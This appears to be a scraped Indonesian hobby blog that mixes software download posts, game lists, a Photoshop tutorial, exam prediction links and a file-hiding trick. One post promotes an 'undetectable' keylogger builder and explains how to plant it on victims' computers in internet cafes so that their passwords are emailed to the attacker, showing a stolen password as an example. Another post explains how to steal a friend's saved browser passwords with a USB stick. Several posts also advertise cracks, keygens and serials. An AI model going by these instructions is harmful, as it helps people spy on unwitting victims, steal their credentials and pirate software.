cyber billing

Screen Shoot Cyber Billing Client

Bagi yang mempunyai Warnet Game Online tidak salahnya mencoba billing yang satu ini selain tidak merepotkan sang operator juga tidak cepat hank silahkan download file installer nya

Trojan Remover v6.8.2.2598.20110302

Trojan Remover v6.8.2.2598.20110302

Detects and automatically removes malware without the need to use SAFE mode. Trojan Remover is designed to automatically remove malware (trojans, worms, adware, spyware, etc.) from a PC when standard anti-virus software has either failed to detect the malware or is unable to effectively eliminate it.

Trojan Remover aids in the removal of Malware - Trojan Horses, Worms, Adware, Spyware - when standard anti-virus software either fails to detect them or fails to effectively eliminate them. Standard antivirus programs are good at detecting this Malware, but not always so good at effectively removing it.

Trojan Remover is designed specifically to disable/remove Malware without the user having to manually edit system files or the Registry. The program also removes the additional system modifications some Malware carries out which are ignored by standard antivirus and trojan scanners.

What Trojan Remover Does
Trojan Remover examines all the system files, the Windows Registry and the programs and files loaded at boot time. The majority of malicious programs (once triggered) load this way.

Trojan Remover scans ALL the files loaded at boot time for Adware, Spyware, Remote Access Trojans, Internet Worms and other malware. Trojan Remover also checks to see if Windows loads Services which are hidden by Rootkit techniques and warns you if it finds any.

For each identified Trojan Horse, Worm, or other malware, Trojan Remover pops up an alert screen which shows the file location and name; it offers to remove the program's reference from the system files and allows you to rename the file to stop its activation.

Most modern Malware programs are memory-resident, which makes their de-activation more difficult. How many times have you been told to start your computer in 'Safe' mode, or even worse, in DOS? Trojan Remover does all this for you. When it finds Malware that is memory-resident, Trojan Remover automatically re-starts (on request) your system and completely DISABLES the Malware before Windows restarts.

Trojan Remover writes a detailed logfile every time it performs a scan. This logfile contains information on which programs load at boot-time, and what (if any) actions Trojan Remover carried out. The logfile can be viewed and printed using Notepad.

The FastScan component of Trojan Remover is set to automatically scan for Malware every time you start your PC (you can disable this if you wish). You can also run the FastScan manually any time you wish (START | Programs | Trojan Remover | FastScan). This FastScan checks all program-loading points - it is a quick and effective check for actively-loading malicious programs.

You can scan the whole drive, or any directories on the drive, by selecting Scan a Drive/Directory from the main Trojan Remover menu. You can scan individual files and directories from within Windows Explorer.

Trojan Remover incorporates an integral Updater allowing for quick and easy Database updates. You can use the Windows Task Scheduler to schedule automatic updates.


VideoInspector - Silent

VideoInspector - Silent

VideoInspector is a tools designed to provide you with as much information as possible about your video files. With VideoInspector you'll know why your video files has no sound or refuses to play correctly. VideoInspector will help you installing the required CoDecs (coder/decoder software) for an optimal performance. VideoInspector can also inspect your system to find which codecs are available, and it can also process multiple video files and export its result in HTML or plain text files.

- Container support : AVI, Matroska, MPEG I, MPEG II, QuickTime
- Codecs requirements automatic detection
- File intergrity check
- Automatic, content based container format detection
- Displays movie info : Duration, streams
- Displays Video stream info : Resolution, bitrate, frames per seconds (FPS)
- Displays Audio stream info : Sample rate, bitrate, number of channels
- Calculates video quality factor
- Windows Shell Integration (Drag'n'Drop and Context menu)
- International support
- And much more !


Winamp Pro 5.601 Build 3091 [Lokal IIX Server]

Winamp Pro 5.601 Build 3091 Final - Multilingual - Full

Incl. serials ( 100% Working )
Released: December 08, 2010

Winamp Pro 5 Features: Silahkan cekidot di sini

■ New! Android Wi-Fi support
■ [b]New! Direct mouse wheel support
■ New! Option to write ratings to tags (for mp3, wma/wmv, ogg & flac)
■ New! Native video support including the most popular file formats for H.264 encoded video
■ New! Windows 7 Compliant including new Win7 preview capabilities with the new Aero Interface.
■ New! Buy tickets, find lyrics, & download music directly from your media player
■ New! Winamp OrglerTM lets you track, chart and share your Winamp listening history
■ New! Find & manage Add-ons directly in your media player
■ New! Winamp detection browser plugins for IE & Firefox
■ New! MPEG-4 video support for in_mp4 & in_flv
■ New! Improved iPod Sync Support
■ New! iTunes Library Import
■ New! Online Services Gallery
■ OurStage Radio Online Services
■ Spinner MP3 of the Day Online Service
■ Now Playing: Discover Artist Songs, Videos, Radio and Photos
■ AOL Radio Powered by CBS Radio
■ Expanded Flash video support
■ Media Monitor: Playing music on the web just got even better
■ Language packs available in Chinese, Japanese and Korean
■ Updated Winamp toolbar - control Winamp from your browser
■ A Redesigned Unified Interface, including Album Art
■ Remote Music and Video Playback and Sharing
■ Dynamic Song Recommendations Playlist Feature
■ Multi-channel MP3 Surround Support
■ Mass Auto-Tagger Provides Latest Music Metadata
■ Integrated Web Search for Artist and Track Information
■ Album Art Support for Portable Devices
■ Updated Podcast Directory and Download Manager
■ Fully Integrated Web browser and customizable links
■ New Visualizer Plug-in - Milkdrop 2
■ Pro! Rips CDs to MP3
■ Pro! Rips CDs to aacPlus, AAC, WMA Unlimited!
■ Pro! Rip to HE-AAC Over 128k!
■ Pro! Burn CDs Up to 48x!
■ Portable Device Sync support
■ Expanded Podcast Directory
■ Smart views with new pre-sets for dynamic playlists
■ Plays an insane amount of audio and video types: see them all! Compatible with Winamp 2 Plug-ins
■ Full Support for Classic Skins
■ Full Support for Modern Skins
■ Access over 18,000 SHOUTcast Radio Stations
■ Enjoy thousands of free songs and videos
■ Playback the AOL Video catalogue of video content
■ Listen to AOL Radio stations
■ Download thousands of Skins and Plug-ins
■ 50 Free MP3 Downloads compliments of eMusic
■ Listen to Free MP3 of 'Charlotte' by Booka Shade

Winamp Main Window
■ Winamp 5 features our new Modern Skin that's easier to use and more powerful than ever
■ Easily access the Media Library (ML), Playlist Editor (PL), integrated Video or Visualizations (Video/Vis Drawer), or the EQ, Skin Options, and Color

Themes (Config Drawer) from the Main Window
■ Includes over 50 color themes that suit nearly every mood or occasion!
■ Winamp 5 carries forward the unobtrusive "Window Shade"

Winamp Playlist Editor
■ Drag and drop media directly into a Playlist from Windows Explorer or the Media Library
■ Jump directly to an item within the list by double clicking it or selecting the item and press Enter
■ Sort Playlists by title, file name, or path and file name
■ Easily Open and Save Playlists from the Manage Playlist button

Winamp Library
■ Organize and find your favorite songs and videos in ONE place
■ Rip your favorite music CDs into AAC or MP3 (Ripping limited to 2x speeds for free users. MP3 encoding is only available in Winamp Pro)
■ Burn your favorite music compilations to CD (limited to 2x for free users)
■ Media Library "Views" allow you to easily create rule based lists of your media
■ Easily modify your music collections tags (Artist, Album, Song name, etc.)
■ Internet Radio and TV
* Easily tune into user created Internet TV and Radio stations
* Over 4000 Internet Radio stations and 40 Internet TV channels to choose from
* Bookmark your favorite stations and channels for future access
■ Winamp Now Playing
* View album art, artist biographies, discographies
* Keep track of your favorite artists by browsing fan sites and news articles presented in the client
* Easily buy your favorite CDs, memorabilia, or just sell your own

Winamp Video
■ Play many major video formats (NSV, WMV, MPG, etc.) with ease
■ Easily resize video playback using the 1x, 2x, and Maximize window buttons
■ Watch your favorite videos in Full Screen mode
■ Quick access to dozens of Internet TV stations created by users
■ Detach the video window from the main player

Winamp Visualizations
■ Winamp 5 comes bundled with the latest version of the ground breaking AVS (Advanced Visualization Studio) and Milkdrop visualizers
■ Enjoy over 100 bundled visualization presets created by users
■ Switch between presets manually or sit back and watch your presets on Random
■ Easily jump to Full Screen mode
■ Download new visualizations and presets from

Winamp Equalizer
■ Shift the sound from both speakers to left or right using the Balance slider
■ Enable Cross Fading to transition the audio smoothly from one song to another
■ Select from the dozens of EQ presets to tune the sound
■ Create your own EQ settings and save them for future use

■ Multilingual: English, Spanish, Italian, French, Japanese, Chinese, Portuguese, Russian, etc
■ Compatible with: All Windows - Incl Windows 7 (32/64-bit)

Link Download

buat software trialmu menjadi full

slamat tinggal software trial....
buat yg suka jgn lupa cendol ya....


Software buat bakar, edit, atau extrak file (iso, .bin, .img, .cif, .nrg, .bwi, dll)








On some antivirus scans, my releases packages can reveal
"Type_Win32" or "Trojan_Type" virus...
Don't be stupid! It is not a virus nor anything else like
that. It is just some packers/cryptors which have the
same binary signature.

However, some crackhosts can modify or add malicious
things on my releases (like "*****.exe"), so please,

We are cool but we don't need newbies or pretentious people.

- Buy it after legal period! -
(Please support the Software Developers)

Gudangnya serial, cr4ck-an, keyg3n, & patch disini




Doyan Download Tapi Gak Punya Duit ... !!!!


Tapi Ga Punya Duit Buat Regist3r
R4pidshare, 4Shar3d, Meg4Upload dll...??

Disini Bos solusinya:

Tanpa register, tanpa nunggu, tanpa dibatasi speednya ...


Oh iya Cr4ckan, seri4l, keyg3n, & patchnya cari disini:

[SHARE] Keylogger yang bisa ngirim log ke email kita. wajib punya gan

gua mu bagi2 keylogger yang menurut gua bagus banget.. sampe sekarang masih UD ( un detecttable ) salah satu keylogger yg gua pake :

1. gampang makenya.
2. klo di pasang di warnet enak banget.. nembus registry n starup soalnya soalna ada beberapa yang udah gua coba pake di warnet... abis 2 x restar tuh program nya langsung ngak jalan.. klo ini dah gua buktiin jalan.

nie gambarnya :

caranya :

1. isi gmail account lo : contoh :
2. isi passnya dengan pass gmail lo : xxxxxxxxxx
3. isi log ( itu in second gan ) klo lo mu log nya dikirim per 20 menit berarti isi dengan 1200 ........ klo di warnet enaknya isi dengan 2400..
4. lalu klik build
5. check folder yang tadi.. ada file baru namanya Yourlogger ( itu keylogger llo buat di pasang di korban )
6. file yang tadi klik 2x di komp korban lo ( enaknya di pasang di yang punya banyak chip... kan lo bisa tajir ) beres de..
7. langkah terakhir ini paling enak.. tunggu email datang yang dalemnya isinya email dan password nya ( bisa di buka dirumah sambil makan baso + es campur gan )

nie hasil2 email yang gua dapet :


cara bacanya ( contoh ambil email ama pass FACEBOOK ) :


itu bacanya email FBnya :
passnya : salaran

lo bisa download program nya di sini :
Easy Logger

komp builder dan korban mesti ada : NET.Framework 2
bisa di download di sini :

Curi Password Teman Melalui Flashdisk gw share dikit buat tmn2 cara curi password sum lewat flashdisk....
cara kerja soft ini yaitu mengambil user, email, dan password yang tersimpan didalam browser yang pernah dipakai penggunanya...
naahh,,,bagaimna bisa email n password tersimpan kedlm browser yg dipakai???
bgini,,,disini kita memanfaatkan keteledoran user,,,dimana biasanya ketika teman memasukkan email n passwordnya, akan muncul jendela pop-up (dibawah tab browser)...ada 3 pilihan di jendela pop-up ini, yaitu "remember me", "never for this site (kykx tulisanx gitu...)", "not now"... ketika teman mengklik "remember me" maka otomatis email,user name, n passwordnya akan tersimpan kedalam cache browser yang dipakai....maka dari itu gw tulis judulnya "Curi Password Teman" karena jika teman memakai komputer or laptop pribadi, biasanya dia langsung mengklik "remember me",,,agar ga repot lagi masukin user n password lagi....
kan gampang tuh,,,tinggal pura2 aja pinjam laptopnya ( iseng2 lah mo copy data or tugas) colokin deh flashdisk u yang dah dipasang soft pencurinya....wakakakaa....
bukan ngajarin mencuri yaahhh.....wakakaaa...

lansung aja neh carax....
1. download DI SINI
2. extrak filenya ke flashdiskmu...
3. tinggal colokin deh ke komputer or laptop teman...
otomatis akan ada file notepad yang muncul,,,nah disitulah letak passwordnya....
klo ga jalan otomatis, tinggal klik 2x aja file launch.bat

dosa tanggung sendiri.....hehheeee

Hacker 2

Harry Potter and the Marauder's Map


Cartoon Quiz


Boobs, Butt or Shoulder

Boobs, Butt, or Shoulder 2

Castle Of Cards

Castle Cat 2

Aquarium Sprengischen

Alpine Escape

Animal Hunter

Ant City

Adventures of Jack

Adventures of Blob Bob

Action Fishing

Adventures Of A Space Cowboy

A Navle Battle

3 Foot Ninja 2

3 Foot Ninja

Pacman Killer Game

Sonic Boom Town Game

powered by :rHeza Blogs

Counter-Strike Game

powered by :rHeza Blogs

Drift Battle Game

powered by :rHeza Blogs

Super Mario Revived Game

powered by :rHeza Blogs

Super Mario Flash v2 Game

powered by :rHeza Blogs

Blast Billiards Game

powered by :rHeza Blogs

Membuat mata sharingan dengan adobe photoshop

  • Langkah pertama buat file baru terserah mau diberi nama apa saja, dimensi yang digunakan adalah pixel, ukuran width dan height 800 dengan background white.
  • Langkah berikutnya adalah membuka file foto kamu atau file yang ingin kamu edit matanya menjadi mata sharingan.
  • Pindahkan gambar yang akan di edit ke file photoshop dengan menekan CTRL + A pada foto yang akan di edit, lalu tekan CTRL + C di foto dan pindahkan ke layar new file dengan menekan tombol CTRL + V.
  • Lalu setelah gambar tercopy tekan CTRL + T sesuaikan dengan ukuran file jika kamu mau, bila tidak kamu bisa langsung ke tahap selanjutnya.
  • Ganti nama layer diatas background dengan nama foto.
  • Buat 2 layer baru bernama sharingan kanan dan sharingan kiri. Posisikan ke layer sharingan kanan, lalu copy gambar mata sharingan ke foto yang akan diedit. Begitu pula langkah selanjutnya pada layer sharingan kiri.
  • Pindah lagi ke layer sharingan kanan lalu tekan ALT + SCROLL DEPAN atau CTRL + + untuk menzoom-in (memperbesar ukuran gambar), tekan CTRL + T untuk mensetting ukuran bola mata sharingan dan samakan dengan pupil gambar yang akan diedit, lakukan hal yang sama pada layer sharingan kiri.
  • Hilangkan icon mata pada layer background, sharingan kanan dan sharingan kiri (Indicates layer visibility).
  • Arahkan ke layer foto lalu, langkah selanjutnya menggunakan Magic Wand Tool dan Eraser Tool untuk melubangi dan merapihkan pupil normal yang akan diganti dengan pupil sharingan.
  • Jika diameter eraser tool terlalu besar kamu dapat mensettingnya di pojok kanan atas pada bar brush dibawah menu layer atau menekan tombol F5 lalu ubah ukuran Master Diameter sesuai ukuran yang kamu kehendaki. Jika ingin lebih mendetai dan akurat dalam menghapus bagian yang ingin kamu hapus, kamu bisa perbesar ukuran gambar dengan cara ALT + SCROLL DEPAN atau CTRL + + untuk menzoom-in gambar.
  • Kemudian tahap akhir adalah menaruh layer foto di posisi paling atas yaitu diatas seluruh layer-layer yang ada. Munculkan kembali icon mata pada layer sharingan kanan dan kiri.  Jangan lupa save file sebagai JPEG atai BMP atau JPG.
  • Dan selamat anda telah mengubah pupil foto anda menjadi pupil sharingan.
selamat mencoba dan trimakasih............. (^_^)

Play Hacker Game Code

Myspace Game Codes

Qur'an Flash Tajwid

Di bulan suci Ramadhan ini, alangkah baiknya kita isi kegiatan dengan beribadah sebanyak-banyaknya, seperti sholat sunnah, mengaji, dll. nah! berhubung masih di bulan Ramadhan, blog mampirbro mau memberikan software islami, yaitu "Quran Flash Tajwid". Software Qur'an berformat flash ini telah dilengkapi dengan penandaan tajwid pada setiap ayatnya sehingga mempermudah Anda yang ingin memperlajarinya. Software Qur'an Flash ini juga tak perlu di instal alias portable. Tertarik? Cekidot...

Klik untuk MembacaBACA AL-Qur'AN DisiNi


Semoga berguna dan bermamfaat...
Dan semoga amal ibadah kita diterima oleh Allah Subhanahuwata'ala...Amien!

Main Game Arcade di PC

Hai semuwa, sekarang gw akan ngebahas bagai mana cara maen games arcade di PC, tapi ada minimum spesifikasi untuk PC yang bakal di mainkan :
Spesifikasi Minimum
Processor : Pentium 2
Memory : 64 Mb atau lebih
Spesifikasi yang di Sarankan
Processor : Pentium 4
Memory : 512 Mb
kalau di atas udah sama atau lebih dengan spesifikasi komputer di rumah lo , berarti lo udah bisa maenin game Aracade di PC kamu begai mana caranya .
Download Software Mame32 emulator di sini
Download gamenya disini
Kalo yang diatas udah lo dapet tinggal dimaenin aja nih caranya:
  1. Instal/Extract dulu Mame32nya
  2. Sebelum memulai terlebih dahulu, copy-kan game yang sudah di download di folder roms yang ada di folder Mame32
  3. Buka dulu Mame32, dengan mengklik 2x mame32.exe
  4. Pilih game yang akan lo maenin misalnya: Metal Slug 3
  5. Klik double click pada Metal Slug 3
  6. Tuggu beberapa saat, maka akan mucul jendela baru
Selamat bermain
Jangan lupa ngoment ya

Prediksi Ujian Nasional SMA 2011

1. Prediksi Soal Fisika,
click disini
2. Prediksi Soal Biologi,
click disini
3. Prediksi Soal Kimia, click disini
4. Prediksi Soal Bahasa Indonesia,
Click disini
5. Prediksi Soal Bahasa Inggris,
click disini
6. Prediksi Soal Matematika,
click disini

1. Prediksi Soal Geografi,
click disini
2. Prediksi Soal Sosiologi,
click disini
3. Prediksi Soal Bahasa Indonesia,
click disini
4. Prediksi Soal Bahasa Inggris,
click disini
5. Prediksi Soal Matematika,
click disini

1. Panduan Soal Matematika SMK Akuntansi Penjualan, Click disini
2. Panduan Soal Matematika SMK Teknologi Kesehatan Pertanian, Click disini
3. Panduan Soal Matematika SMK Pariwisata, Click disini
4. Prediksi Soal Matematika (all), click disini

1. Predisi Soal Persiapan UAN Matematika, Click disini

1. Prediksi Soal Matematika,
click disini
2. Prediksi Soal bahasa Inggris,
click disini
3. Prediksi Soal IPA,
click disini
4. Prediksi Soal Bahasa Indonesia,
click disini


Menyembunyikan File dalam File Lain

Hai semuwa pernah terpikir tidak, lo membuka sebuah file gambar dengan winamp? atau file avi dengan microsoft word?
kali ni gue akan membahas tentang menyembunyikan file dalam file lain. Baiklah kita akan mulai !
  1. Siapkan file yang ingin kita sembunyikan, misalnya “video.avi” dan file yang ingin menyembunyikan misalnya “latihan.doc”
  2. Klik kanan pada file “video.avi” dan pilih Send To --> Compressed (Zipped) Folder
  3. Buka notepad lalu ketik : copy /b berhasil.doc
  4. dan simpan dengan nama “coba.bat” (Jangan lupa untuk mengubah save as type menjadi all files)
  5. setelah itu jalankan file latihan.bat ini,maka akan tercipta file bernama berhasil.doc
  6. Bila file “berhasil.doc” ini dibuka dengan Microsoft Word, maka masih bisa dibuka. Namun bila file ini dibuka dengan Winrar, maka file ini juga bisa terbuka dan di dalamnya ada file yang kita sembunyikan. Selesai deh menyembunyikan file ke dalam file lain.
Semoga bermanfaat
Jangan lupa ngoment yaa !!
